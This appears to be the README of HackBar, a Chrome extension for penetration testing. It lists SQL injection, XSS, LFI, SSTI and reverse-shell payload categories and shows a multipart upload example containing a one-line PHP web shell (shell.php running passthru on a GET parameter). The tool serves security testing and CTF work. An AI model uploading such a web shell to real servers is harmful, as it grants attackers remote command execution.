HackBar for Chrome.
Available on Chrome Web Store.
- tabs
- webRequest
- webRequestBlocking
Supported methods
- GET
- POST
  - application/x-www-form-urlencoded
  - multipart/form-data
  - application/json
Auto Test
- Common paths (Wordlist from dirsearch included)
SQLi
- Dump all database names (MySQL, PostgreSQL)
- Dump tables from database (MySQL, PostgreSQL, SQLite)
- Dump columns from database (MySQL, PostgreSQL, SQLite)
- Union select statement (MySQL, PostgreSQL, SQLite)
- Error-based injection statement (MySQL, PostgreSQL)
- Dump in one shot payload (MySQL)
- Dump current query payload (MySQL)
- Space to Inline comment
XSS
- Vue.js XSS payloads
- Angular.js XSS payloads for strict CSP
- Some snippets for CTF
- HTML encode/decode with hex/dec/entity name
- String.fromCharCode encode/decode
LFI
- PHP wrapper - Base64
SSTI
- Jinja2 SSTI (Flask RCE Reference)
- Java SSTI
Shell
- Python reverse shell cheatsheet
- bash reverse shell cheatsheet
- nc reverse shell cheatsheet
- php reverse shell/web shell cheatsheet
Encoding
- URL encode/decode
- Base64 encode/decode
- Hexadecimal encode/decode
- Unicode encode/decode
- Escape ASCII to hex/oct format
Hashing
- MD5
- SHA1
- SHA256
- SHA512
- Open Developer tools (Press F12 or Ctrl + Shift + I)
- Switch to HackBar tab
- Enjoy it
Description | Default | Mac |
---|---|---|
Load | Alt + A | Control + A |
Split | Alt + S | Control + S |
Execute | Alt + X | Control + X |
After changing enctype field to multipart/form-data, you can put your payload into Body field such as the following:

```
------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="user"

user
------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-httpd-php

<?php passthru($_GET['c']); ?>
------WebKitFormBoundarydbJBATDXCC6CL0lZ--
```
We treat the first line as the boundary and reconstruct a form element to send your request.
Therefore, the boundary that is sent will not be the same as the one you typed.
After changing enctype field to application/json, you can put your payload into Body field such as the following:

```
{
  "username": "admin",
  "password": "admin"
}
```
If your payload doesn't contain `=`:
In order to post JSON data, we will insert a dummy field or object into your JSON, such as the following:

```
{"username":"admin","password":"admin","4dxnzjzd5mi":"="}
```
For more details, please visit "Posting JSON with an HTML Form".
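
The dummy-field behaviour described above, as an added example (not HackBar's own code; function names are hypothetical). It assumes the `text/plain` form encoding used in the linked article, splits the JSON at the first `=` to form one field, and shows the two server-side signals this leaves: a non-JSON Content-Type and an unexpected member.

```javascript
// Added example; function names are hypothetical, not HackBar's code.
// Assumption: the form is submitted with enctype="text/plain", where each
// field is serialised as name=value followed by CRLF.

// Split a JSON object so it fits one form field (name before "=", value after).
function jsonToFormField(jsonText, dummyKey = "dummy") {
  const obj = JSON.parse(jsonText); // throws on invalid JSON
  if (obj === null || typeof obj !== "object" || Array.isArray(obj)) {
    throw new TypeError("this sketch only handles JSON objects");
  }
  let body = JSON.stringify(obj);
  if (!body.includes("=")) {
    // Nothing to split on: append a dummy member whose value is "=".
    body = JSON.stringify({ ...obj, [dummyKey]: "=" });
  }
  const i = body.indexOf("=");
  return { name: body.slice(0, i), value: body.slice(i + 1) };
}

// What the browser puts on the wire for that single field.
function serializeTextPlain(field) {
  return `${field.name}=${field.value}\r\n`;
}

// Server-side check: flag bodies that parse as JSON but did not arrive as
// JSON, or that carry members the endpoint does not define.
function inspectRequest(contentType, body, allowedKeys) {
  const findings = [];
  const mediaType = contentType.split(";")[0].trim().toLowerCase();
  if (mediaType !== "application/json") {
    findings.push(`unexpected content type: ${mediaType}`);
  }
  const extra = Object.keys(JSON.parse(body)).filter((k) => !allowedKeys.includes(k));
  if (extra.length > 0) findings.push(`unknown keys: ${extra.join(",")}`);
  return findings;
}

// Constructed sample input, taken from the JSON shown above.
const field = jsonToFormField('{"username":"admin","password":"admin"}');
const wire = serializeTextPlain(field);
console.log(JSON.stringify(wire));
console.log(inspectRequest("text/plain", wire, ["username", "password"]));
```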
- Vue.js
- Vuetify.js
- crypto-js